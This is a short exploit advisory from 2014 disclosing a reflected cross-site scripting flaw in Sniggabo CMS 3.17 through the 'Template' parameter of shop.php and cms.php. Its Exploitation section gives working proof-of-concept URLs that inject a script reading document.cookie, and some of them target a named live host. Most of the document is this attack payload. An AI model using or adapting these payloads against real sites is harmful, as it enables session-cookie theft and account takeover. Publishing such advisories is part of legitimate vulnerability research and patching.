Sniggabo CMS version 3.17 suffers from a cross site scripting vulnerability.
d08eaf053576dff5b89e2f5b00c8c530a7e66a236f16ff7712d6a017779f47f8
Sniggabo CMS v. 3.17 - Cross Site Scripting Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr (onlymail)
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-warrior.org
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Sniggabo CMS
| Version : v. 3.17 (New version)
|~Software Official Website: http://www.sniggabo.no
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "31.AG.2014"
|[~]Tested on : Kali Linux
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploitation
http://Target.com/shop.php?Template= //Script
http://Target.com/cms.php?action=getpoll&Template= //Script
http://test.sniggabo.no/shop.php?Template="><script>alert(document.cookie)</script>
http://test.sniggabo.no/cms.php?action=getpoll&Template="><script>alert(document.cookie)</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~